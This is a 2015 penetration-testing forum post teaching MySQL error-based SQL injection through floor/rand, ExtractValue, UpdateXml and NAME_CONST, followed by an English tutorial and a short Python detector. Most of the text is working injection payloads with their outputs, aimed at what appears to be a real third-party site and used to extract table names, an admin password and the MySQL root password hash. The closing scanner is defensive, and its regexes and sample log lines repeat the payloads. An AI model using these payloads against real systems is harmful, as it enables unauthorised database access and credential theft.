China Cyber Penetration Testing Alliance (中国网络渗透测试联盟)
Title: MySQL error-based injection: exploitation via the floor, ExtractValue and UpdateXml error modes
Author: admin    Time: 2015-11-11 19:03
1. Errors via floor
The following payloads can be used:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
Example:
First, run a normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
The MySQL version is leaked in the error message. To retrieve other data, replace the expression in the position of version() with the query you need.
For example, to retrieve the administrator's username and password:
Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1))
Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
More collected examples:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
Error
Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
Error
Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection tricks for newer MySQL versions: injection using NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error
Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error
Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error
Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error
Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error
Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
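As an added defender-side example (not code from the post or from the forum), the following Python scans web access log lines for the four error-inducing primitives shown in this thread (floor/rand with GROUP BY, ExtractValue, UpdateXml, and the doubled NAME_CONST) and scans application error output for the MySQL error strings they produce. The log lines, client IP and script paths are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the four error-inducing primitives, applied to
# the URL-decoded, lower-cased, whitespace-collapsed query string.
REQUEST_SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by"),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
    "name_const_join": re.compile(r"name_const\s*\(.*name_const\s*\("),
}
# Response-side signatures: the MySQL error text each primitive produces when
# the application echoes mysql_error() back to the client.
ERROR_SIGNATURES = {
    "duplicate_group_key": re.compile(r"Duplicate entry '.*' for key 'group_key'"),
    "xpath_syntax_error": re.compile(r"XPATH syntax error: '"),
    "duplicate_column": re.compile(r"Duplicate column name '"),
}

def normalize_query(url):
    """Decode %xx and '+', drop /**/ comments, collapse whitespace, lower-case."""
    q = unquote_plus(url.split("?", 1)[1]) if "?" in url else ""
    q = re.sub(r"/\*.*?\*/", " ", q)
    return re.sub(r"\s+", " ", q).lower()

def scan_request(url):
    """Names of error-based injection primitives present in a request URL."""
    q = normalize_query(url)
    return sorted(n for n, rx in REQUEST_SIGNATURES.items() if rx.search(q))

def scan_error_text(text):
    """Names of error-leak signatures present in application or DB error output."""
    return sorted(n for n, rx in ERROR_SIGNATURES.items() if rx.search(text))

def scan_access_log(lines):
    """Yield (client_ip, url, hits) for each common-log-format line with a hit."""
    rx = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\w+ (\S+) ')
    for line in lines:
        m = rx.match(line)
        if m and (hits := scan_request(m.group(2))):
            yield m.group(1), m.group(2), hits

# Constructed sample log lines (not real traffic); payloads mirror the post above.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Nov/2015:19:03:00 +0800] "GET /detail.php?id=330 HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Nov/2015:19:03:01 +0800] "GET /detail.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 88',
    '203.0.113.5 - - [11/Nov/2015:19:03:02 +0800] "GET /detail.php?id=1+and+extractvalue(1,concat(0x5c,(select+user()))) HTTP/1.1" 500 70',
    '203.0.113.5 - - [11/Nov/2015:19:03:03 +0800] "GET /detail.php?id=1+and+1=(updatexml(1,concat(0x3a,(select+user())),1)) HTTP/1.1" 500 70',
    '203.0.113.5 - - [11/Nov/2015:19:03:04 +0800] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 90',
]
```

Request-side hits flag the probe even when the application hides its errors; the error-text signatures are for catching the leak itself in application logs or HTTP response bodies.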